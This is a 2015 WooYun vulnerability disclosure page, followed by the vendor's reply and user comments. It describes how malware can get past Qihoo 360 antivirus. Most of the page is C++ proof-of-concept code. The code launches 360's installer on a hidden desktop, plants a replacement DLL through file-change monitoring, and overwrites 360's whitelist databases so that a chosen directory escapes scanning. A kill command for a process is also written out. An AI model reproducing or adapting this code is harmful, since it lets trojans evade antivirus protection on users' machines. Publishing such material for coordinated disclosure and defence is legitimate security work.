当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096329

漏洞标题:提权替换360信任列表数据库添加目录到扫描白名单(木马躲避杀毒技巧)

相关厂商:奇虎360

漏洞作者: 路人甲

提交时间:2015-02-25 15:29

修复时间:2015-05-27 10:18

公开时间:2015-05-27 10:18

漏洞类型:非授权访问/认证绕过

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-25: 细节已通知厂商并且等待厂商处理中
2015-02-26: 厂商已经确认,细节仅向厂商公开
2015-03-01: 细节向第三方安全合作伙伴开放
2015-04-22: 细节向核心白帽子及相关领域专家公开
2015-05-02: 细节向普通白帽子公开
2015-05-12: 细节向实习白帽子公开
2015-05-27: 细节向公众公开

简要描述:

提升权限将特定目录添加到360安全卫士和杀毒的白名单中。

详细说明:

通过创建虚拟桌面提升自身权限,释放原设定好的白名单数据库文件替换掉现有白名单数据库文件speedmem2.hg和sl2.db,达到添加制定目录为信任目录的结果,致使木马逃避掉360杀毒的扫描。

2.jpg


444.png

漏洞证明:

提升提升权限部分:

HINSTANCE hInstance = NULL;
DWORD WINAPI MainBacak(LPVOID lpParameter)
{
SetPriorityClass( GetCurrentProcess(), HIGH_PRIORITY_CLASS );
char MydirPath[MAX_PATH];
SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
CHAR MyDir[MAX_PATH];
wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath);
const int buf_size = 1024;
CHAR buf[buf_size];
DWORD dwBufWrittenSize;
HANDLE hDir;
hDir = CreateFile(MyDir, FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDir == INVALID_HANDLE_VALUE)
{
CloseHandle(hDir);
exit(0);
}
while(1)
{
if(ReadDirectoryChangesW(hDir, &buf, buf_size, TRUE ,
FILE_NOTIFY_CHANGE_FILE_NAME|
FILE_NOTIFY_CHANGE_DIR_NAME|
FILE_NOTIFY_CHANGE_ATTRIBUTES|
FILE_NOTIFY_CHANGE_SIZE|
FILE_NOTIFY_CHANGE_LAST_WRITE|
FILE_NOTIFY_CHANGE_LAST_ACCESS|
FILE_NOTIFY_CHANGE_CREATION|
FILE_NOTIFY_CHANGE_SECURITY,
&dwBufWrittenSize, NULL, NULL))
{
FILE_NOTIFY_INFORMATION * pfiNotifyInfo = (FILE_NOTIFY_INFORMATION*)buf;
char* pszMultiByte;
pszMultiByte = new char[512];
ZeroMemory( pszMultiByte, 512);
WideCharToMultiByte(CP_ACP, 0,pfiNotifyInfo->FileName, pfiNotifyInfo->FileNameLength/2, pszMultiByte, 512, NULL, NULL);

char *p;
p=strstr(pszMultiByte,"360net.dll");
if(p!=NULL)
{
char tmp360net[MAX_PATH]={0};
lstrcpy(tmp360net,pszMultiByte);
switch(pfiNotifyInfo->Action)
{
case FILE_ACTION_ADDED:
delete []pszMultiByte;
break;
case FILE_ACTION_REMOVED:
delete []pszMultiByte;
break;
case FILE_ACTION_MODIFIED:
lstrcat(MyDir,tmp360net);
if (CopyFile("Dll.dll",MyDir,FALSE)!=0)
{
delete []pszMultiByte;
CloseHandle(hDir);
return 1;

}
else
{
delete []pszMultiByte;
return 0;
break;
}


default:
break;
}
}

}

}
CloseHandle(hDir);
return 0;
}
DWORD WINAPI MainDesk(LPVOID lpParameter)
{
HDESK hDesk = CreateDesktop("Virtual",
NULL,
NULL,
DF_ALLOWOTHERACCOUNTHOOK,
DESKTOP_CREATEWINDOW|
DESKTOP_ENUMERATE|
DESKTOP_READOBJECTS|
DESKTOP_WRITEOBJECTS|
DESKTOP_HOOKCONTROL ,
NULL
);
STARTUPINFO si = {sizeof(si)};
si.lpDesktop = "Virtual";
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
PROCESS_INFORMATION pi = {0};
if(!CreateProcess(NULL,(LPSTR)(LPCSTR)lpParameter, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
CloseDesktop(hDesk);
return 0;
}
return 1;
}
int main(int argc, char* argv[])
{
char safe[MAX_PATH];
HKEY hkey;
DWORD type = REG_SZ;
DWORD buffSize=sizeof(safe);
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
}
char tmp360safe[MAX_PATH]={0};
lstrcpy(tmp360safe,safe);
lstrcat(tmp360safe,"\\modules\\360Inst.exe");
char MyDir[MAX_PATH];
SHGetSpecialFolderPath(NULL,MyDir,CSIDL_PROFILE,0);
strcat(MyDir,"\\Local Settings\\Temp\\");
MessageBox(NULL,MyDir,NULL,NULL);
ExitProcess(0);
if (access(tmp360safe,0)==0)
{
while(1)
{
HANDLE handle[2];
handle[1]=CreateThread(NULL,NULL,MainBacak,NULL,CREATE_SUSPENDED,NULL);
SetThreadPriority(handle[1],THREAD_PRIORITY_HIGHEST);
ResumeThread(handle[1]);
handle[2]=CreateThread(NULL,NULL,MainDesk,tmp360safe,CREATE_SUSPENDED,NULL);
SetThreadPriority(handle[2],THREAD_PRIORITY_LOWEST);
ResumeThread(handle[2]);
WaitForSingleObject(handle[2],INFINITE);
DWORD lpExitCode2;
GetExitCodeThread(handle[2],&lpExitCode2);
if (lpExitCode2==0)
{
CloseHandle(handle[2]);
CloseHandle(handle[1]);
continue;
}
WaitForSingleObject(handle[1],INFINITE);
DWORD lpExitCode;
GetExitCodeThread(handle[1],&lpExitCode);
if (lpExitCode==1)
{
CloseHandle(handle[1]);
CloseHandle(handle[2]);
Sleep(15000);
}
else
{
CloseHandle(handle[1]);
CloseHandle(handle[2]);
}
}
}

return 0;
}


替换白名单数据库部分:

int Storm(int count)
{
unsigned long Time=GetTickCount();
int seed=rand()+3;
seed=(seed*Time)%count;
return seed;
}
BOOL CALLBACK EnumWindowsProc(HWND hwnd,LPARAM IParam)//回调函数
{
PostMessage(hwnd, WM_CLOSE, 0, 0);
return TRUE;
}
extern "C" __declspec(dllexport)void HttpCreateDownloadObj()
{
char taskkill[MAX_PATH];
wsprintf(taskkill,"taskkill /im load.exe /f");
WinExec(taskkill,SW_HIDE);
EnumWindows(EnumWindowsProc,0);
char safe[MAX_PATH];
char SD[MAX_PATH];
HKEY hkey;
DWORD type = REG_SZ;
DWORD buffSize=sizeof(safe);
DWORD buffSize1=sizeof(SD);
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
}

if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
RegCloseKey(hkey);
}
}
char tmp360safe[MAX_PATH]={0};
lstrcpy(tmp360safe,safe);
lstrcat(tmp360safe,"\\modules\\360Inst.exe");
char MydirPath[MAX_PATH];
SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
CHAR MyDir[MAX_PATH];
wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath);
CHAR speedmem[MAX_PATH];
wsprintf(speedmem,"%s\\sp%cedm%cm.hg",MyDir,'a'+Storm(26),'a'+Storm(26));
CHAR slD[MAX_PATH];
wsprintf(slD,"%s\\s%cefmm%c.ds",MyDir,'a'+Storm(26),'a'+Storm(26));
speedmemSaveFile(speedmem);
sdSaveFile(slD);
CHAR Newspeedmem[MAX_PATH];
wsprintf(Newspeedmem,"%s\\deepscan\\speedmem2.hg",safe);
CHAR NewslD[MAX_PATH];
wsprintf(NewslD,"%s\\sl2.db",SD);
DeleteFile(Newspeedmem);
DeleteFile(NewslD);
CopyFile(speedmem,Newspeedmem,FALSE);
CopyFile(slD,NewslD,FALSE);
DeleteFile(speedmem);
DeleteFile(slD);
return;
}


speedmemSaveFile与sdSaveFile分别是生成了之前在360杀毒和360安全卫视下设定好路径的白名单数据库文件。

修复方案:

你们自然晓得怎么修复啦:P

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-26 10:17

厂商回复:

感谢乌云白帽子的报告
此问题是通过360安全卫士中一处防御缺陷突破信任机制实现的白名单篡改。

我们在一个月以前就已经从其它渠道获知了该漏洞并进行了修复和升级,目前外网的最新版360都不存在此问题。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-25 15:33 | 无心、 ( 实习白帽子 | Rank:71 漏洞数:20 | 你不是风儿,我也不是沙,再怎么缠绵也到不...)

    前排。

  2. 2015-02-25 15:45 | Taro ( 普通白帽子 | Rank:178 漏洞数:48 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    看热闹来了

  3. 2015-02-25 15:47 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    想法挺有趣

  4. 2015-02-25 16:02 | RainShine ( 路人 | Rank:2 漏洞数:4 )

    我就看热闹……

  5. 2015-02-25 16:03 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    @疯狗 狗哥求审核漏洞哇~http://www.wooyun.org/bugs/wooyun-2015-098220/trace/d3696fac6fedfc73e5b9cb3414e41f22 http://www.wooyun.org/bugs/wooyun-2015-098218/trace/7ede802f3e44c53f6bd9c619d4cdfb58 http://www.wooyun.org/bugs/wooyun-2015-098216/trace/8622604ba8dbab65162a1716ffd597d6 http://www.wooyun.org/bugs/wooyun-2015-098214/trace/d5f7b1cdff61c342ea8180df5ab97902 http://www.wooyun.org/bugs/wooyun-2015-098213/trace/7afe8ec3e38a4f0ca605bbe66410cab9 http://www.wooyun.org/bugs/wooyun-2015-098182/trace/f63e50138f738b4520247685231d625b http://www.wooyun.org/bugs/wooyun-2015-098181/trace/3e84e04ccad83703fa88cc5da607d53a http://www.wooyun.org/bugs/wooyun-2015-098086/trace/bbba155e0342206751099e13e46988a2 http://www.wooyun.org/bugs/wooyun-2015-098085/trace/a7013d64e1e464e91f768c93532ce809 http://www.wooyun.org/bugs/wooyun-2015-098080/trace/e201246320266c46147badb5ae8cd253 http://www.wooyun.org/bugs/wooyun-2015-097988/trace/fc118e708b58889b3eb32f22364952d7 http://www.wooyun.org/bugs/wooyun-2015-097890/trace/df69ebc6823c8cc505a360c92fb8aa16 http://www.wooyun.org/bugs/wooyun-2015-097754/trace/5cc4b0424a2adacabb6b34d50ef910af http://www.wooyun.org/bugs/wooyun-2015-095786/trace/0a7e573a6b7cb12b7421ec5a745456ae http://www.wooyun.org/bugs/wooyun-2015-094879/trace/63d9f708ea64bbe409f578cc0f769aa5

  6. 2015-02-25 19:32 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    能不能把360加到黑名单……

  7. 2015-02-25 20:14 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    还以为把360提权了呢

  8. 2015-02-25 21:17 | 陆由乙 ( 普通白帽子 | Rank:119 漏洞数:38 | 呵呵!)

    360的白名单目录你找得到吗?

  9. 2015-05-27 10:43 | milan ( 普通白帽子 | Rank:129 漏洞数:32 | 妈妈说:搬不完砖就别回家。)

    @浅蓝 哥 你命真苦 都没审核通过